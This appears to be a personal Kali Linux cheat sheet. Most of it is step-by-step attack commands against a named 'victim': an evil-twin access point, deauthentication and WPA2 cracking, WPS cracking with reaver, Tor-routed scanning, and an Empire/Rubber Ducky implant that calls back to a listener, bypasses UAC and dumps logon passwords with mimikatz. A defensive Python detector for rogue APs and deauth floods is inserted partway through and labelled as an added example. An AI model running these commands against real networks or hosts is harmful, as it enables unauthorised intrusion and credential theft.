Airbase-ng – Evil Twin

Check wifi interface

  • iwconfig

Turn up the power

  • iwconfig wlan0 txpower 27

Start wifi interface

  • airmon-ng start wlan0

Capture data & choose target AP

  • airodump-ng wlan0mon

Create Fake AP

  • airbase-ng -c 11 -a 20:34:67:24:89:76 -e FakeAP -v -z 2 wlan0mon

Create Evil Twin AP

  • airbase-ng -a [victim AP MAC] -c 11 -Z 4 --essid VictimAP wlan0mon

Monitor Evil Twin AP

  • airodump-ng --bssid [victim AP MAC] wlan0mon --channel 11 -w /root/Desktop/rogueap

Deauthentication

  • aireplay-ng -0 2 -a [router bssid] -c [Client MAC address] wlan0mon

Aircrack

  • aircrack-ng -b [victim AP MAC] -w /usr/share/wordlists/rockyou.txt /root/Desktop/rogueap-01.cap

WPA2 + Aircrack-ng

  1. Show wifi interfaces
    1. airmon-ng
    2. airmon-ng check kill (if the wifi interface doesn't show up correctly)
  2. Start wifi interface
    1. airmon-ng start wlan0
  3. Scan for wifi networks
    1. airodump-ng wlan0mon
  4. Choose wifi to test
    1. ctrl+c to stop scanning
    2. # airodump-ng -c 11 --bssid [router bssid] -w /root/Desktop/wpa2handshake.cap wlan0mon
    3. # airodump-ng --ignore-negative-one --bssid [router bssid] -c 11 -w /root/Desktop/wpa2handshake.cap wlan0mon (alternative method)
  5. DeAuth clients on victim AP
    1. # aireplay-ng -0 2 -a [router bssid] -c 40:A6:D9:1F:4A:D3 (client MAC address) wlan0mon
    2. Wait for handshake to be captured
  6. Crack handshake
    1. # aircrack-ng -a2 -b [router bssid] -w [path to wordlist] /root/Desktop/*.cap
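Both sections above depend on deauthentication frames, and the first one stands up a second BSSID advertising the target's ESSID; from the defender's side these are exactly the two indicators a wireless IDS watches for. As an added example (not code from this page), the following Python parses raw 802.11 management frames and flags an ESSID beaconed from more than one BSSID and a burst of deauthentication frames against one BSSID. The frames are constructed inline rather than read from a capture; the MAC addresses are the ones used on this page plus one made up for the rogue AP.

```python
import struct
from collections import Counter, defaultdict

BEACON, DEAUTH = 8, 12  # 802.11 management-frame subtypes

def parse_mgmt(frame):
    """(subtype, bssid, ssid) for a raw 802.11 management frame (no radiotap), else None."""
    if len(frame) < 24 or (frame[0] >> 2) & 0x3 != 0:  # frame type 0 == management
        return None
    subtype, ssid = frame[0] >> 4, None
    bssid = ":".join(f"{b:02x}" for b in frame[16:22])  # addr3 carries the BSSID
    if subtype == BEACON:
        body = frame[36:]  # skip timestamp(8), beacon interval(2), capability(2)
        while len(body) >= 2:  # walk information elements until the SSID element (id 0)
            eid, elen = body[0], body[1]
            if eid == 0:
                ssid = body[2:2 + elen].decode("utf-8", "replace")
                break
            body = body[2 + elen:]
    return subtype, bssid, ssid

def analyse(frames, deauth_threshold=5):
    """Flag an ESSID beaconed by more than one BSSID, and deauth bursts per BSSID."""
    ssid_bssids, deauths = defaultdict(set), Counter()
    for frame in frames:
        parsed = parse_mgmt(frame)
        if parsed is None:
            continue
        subtype, bssid, ssid = parsed
        if subtype == BEACON and ssid:
            ssid_bssids[ssid].add(bssid)
        elif subtype == DEAUTH:
            deauths[bssid] += 1
    return {
        "evil_twin": {s: sorted(b) for s, b in ssid_bssids.items() if len(b) > 1},
        "deauth_flood": {b: n for b, n in deauths.items() if n >= deauth_threshold},
    }

# Constructed sample frames, not a real capture: FC, duration, addr1, addr2, addr3, seqctl, body.
def beacon(bssid, ssid):
    hdr = b"\x80\x00\x00\x00" + b"\xff" * 6 + bssid + bssid + b"\x00\x00"
    body = b"\x00" * 8 + struct.pack("<HH", 100, 0x0411) + bytes([0, len(ssid)]) + ssid.encode()
    return hdr + body

def deauth(bssid, client):  # reason code 7: class 3 frame received from nonassociated STA
    return b"\xc0\x00\x00\x00" + client + bssid + bssid + b"\x00\x00" + struct.pack("<H", 7)

LEGIT, ROGUE, CLIENT = (bytes.fromhex(h) for h in ("203467248976", "00c0ca000001", "40a6d91f4ad3"))
SAMPLE_FRAMES = [beacon(LEGIT, "VictimAP"), beacon(ROGUE, "VictimAP"), beacon(LEGIT, "HomeNet")]
SAMPLE_FRAMES += [deauth(LEGIT, CLIENT)] * 6  # a burst of six deauths against the legit BSSID
```

On a real capture, strip the radiotap header first and feed only the 802.11 frames to analyse(); the deauth threshold should be tuned per site since a handful of deauths per minute is normal roaming noise.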

Empire + Ducky

1. Create listener 
1a. (Empire) > listeners
1b. (Empire: listeners) > set Name Listener01
1c. (Empire: listeners) > execute
1d. (Empire: listeners) > back
2. Create ducky payload
2a. (Empire) > agents
2b. (Empire: agents) > usestager ducky 
2c. (Empire: stager/ducky) > set listener Listener01
2d. (Empire: stager/ducky) > set Outfile /home/ducky.txt
2e. (Empire: stager/ducky) > generate
3. Put payload onto Ducky
3a. Generate inject.bin file from code in ducky.txt
at the Duck Toolkit site
3b. Copy inject.bin to Ducky
3c. Inject Ducky on victim
4. Try to extract login passwords from victim
4a. Wait for victim to connect back to Empire
4b. (Empire) > agents
4c. (Empire: agents) > list
4d. (Empire: agents) > interact FSDFSGAJ34FGH4
4e. (Empire: FSDFSGAJ34FGH4) > sysinfo
4f. (Empire: FSDFSGAJ34FGH4) > usemodule privesc/bypassuac
4g. (Empire: privesc/bypassuac) > set Listener Listener01
4h. (Empire: privesc/bypassuac) > run
4i. (Empire: privesc/bypassuac) > back * 2
4j. (Empire: agents) > list
4k. (Empire: agents) > interact DSGHFDFSGHJ243J
4l. (Empire: DSGHFDFSGHJ243J) > usemodule credentials/mimikatz/logonpasswords
4m. (Empire: credentials/mimikatz/logonpasswords) > run

If successful, logon passwords are now revealed in cleartext :)

Tor + proxychains + Kali

  1. Update Kali
    1. apt-get update
  2. Configure apt sources
    1. leafpad /etc/apt/sources.list
      1. add 'deb http://deb.torproject.org/torproject.org wheezy main'
  3. Install Tor gpg keys
    1. gpg --keyserver keys.gnupg.net --recv 886DDD89
    2. gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add -
    3. apt-get update
    4. apt-get install deb.torproject.org-keyring
  4. Install Tor
    1. apt-get install tor
  5. Configure proxychains
    1. leafpad /etc/proxychains.conf
      1. uncomment 'dynamic_chain'
      2. comment out 'static_chain'
      3. add 'socks5 127.0.0.1 9050' at the end of the file
  6. Start Tor
    1. service tor start
  7. Execute proxychains
    1. proxychains nmap 1.2.3.4

Aircrack-ng + reaver + pixiewps

Prereqs:

  • Kali Linux
  • Run "apt-get update && apt-get dist-upgrade -y" on your Kali Linux machine

1) Install reaver

root@kali:~# apt-get install reaver aircrack-ng

2) Put your interface in monitor mode:

root@kali:~# airmon-ng start wlan0

Note: You should now have a monitor interface named 'wlan0mon'

3) Identify AP in-scope for testing

root@kali:~# airodump-ng wlan0mon --wps

Note: Identify the in-scope AP's MAC address (BSSID) and the channel it runs on

4) Run reaver with gathered info 

root@kali:~# reaver -i wlan0mon -c 11 -b 12:34:56:78:90:12 -K 1

5) Behold pixiewps magic

You're presented with the WPS PSK within seconds, thanks Kali, reaver & pixiewps ... that's what I call an alliance of power

Scripts :: Kali


KAAISv3 by rawstring

  • wget http://sourceforge.net/projects/kaais/files/kaaisv3.sh

netool.sh v4.3 by peterubuntu10

  • wget http://downloads.sourceforge.net/project/netoolsh/opensource%5Bkali%5D.tar.gz

Lazy Kali

https://code.google.com/p/lazykali/

  • wget https://lazykali.googlecode.com/files/lazykali.sh
  • wget https://lazykali.googlecode.com/files/hackpack.tar.gz

Pentesh.sh by phillips321.co.uk

  • svn checkout http://phillips321.googlecode.com/svn/trunk/ phillips321

Discover.sh by Lee Baird

  • git clone https://github.com/leebaird/discover.git

1st setup :: Kali


Correct sources.list

nano /etc/apt/sources.list
add following to sources.list:

Regular repos
deb http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free

Bleeding Edge repos
deb http://http.kali.org/kali kali-bleeding-edge contrib non-free main

# apt-get update
# apt-get upgrade

In VBox Environ

VBox Additions
1. apt-get update && apt-get install linux-headers-$(uname -r) -y
2. mount VBoxAdditions package
3. copy install package (VBoxLinuxAdditions.run) to /tmp
4. chmod 755 /tmp/VBoxLinuxAdditions.run
5. ./VBoxLinuxAdditions.run
6. logout or reboot guest machine

Update

  • apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y && reboot


Kali Pi :: Initial Setup


Networking

[Static IP]
nano /etc/network/interfaces

Add the following lines at the bottom of the file (comment out the lines above, except the loopback iface):

auto eth0
allow-hotplug eth0
iface eth0 inet static
address 192.168.1.8
netmask 255.255.255.0
gateway 192.168.1.1

[DNS Conf]
nano /etc/resolv.conf
nameserver 192.168.1.1
nameserver 8.8.8.8

[Assign static default gateway]
ip route add default via 192.168.1.1

[Restart networking]
/etc/init.d/networking restart

Rebuild ssh keys
rm /etc/ssh/ssh_host_*
dpkg-reconfigure openssh-server
service ssh restart

Expand USB
run /scripts/rpi-wiggle.sh

Update Kali
apt-get update && apt-get -y upgrade && apt-get -y dist-upgrade && apt-get autoremove && reboot

Check service status
service ssh status
service postgresql status
service apache2 status

Apps

- TightVNC
apt-get install tightvncserver
update-rc.d tightvncserver enable

[Reset password]
vncpasswd

- Metasploit
apt-get install metasploit-framework
update-rc.d metasploit-framework enable

- LazyKali
wget lazykali.googlecode.com/files/lazykali.sh
wget lazykali.googlecode.com/files/hackpack.tar.gz

Make services persistent
update-rc.d ssh enable
update-rc.d apache2 enable
update-rc.d postgresql enable
update-rc.d metasploit-framework enable

XFCE on Kali


Install
apt-get install kali-defaults kali-root-login desktop-base xfce4 xfce4-places-plugin xfce4-goodies

Configure default x-session mngr
update-alternatives --config x-session-manager

Remove
apt-get remove xfce4 xfce4-places-plugin xfce4-goodies

Fix "Warning: gnome-keyring..." error
Edit /etc/xdg/autostart/gnome-keyring-pkcs11.desktop
and add 'XFCE' at the end of the OnlyShowIn line.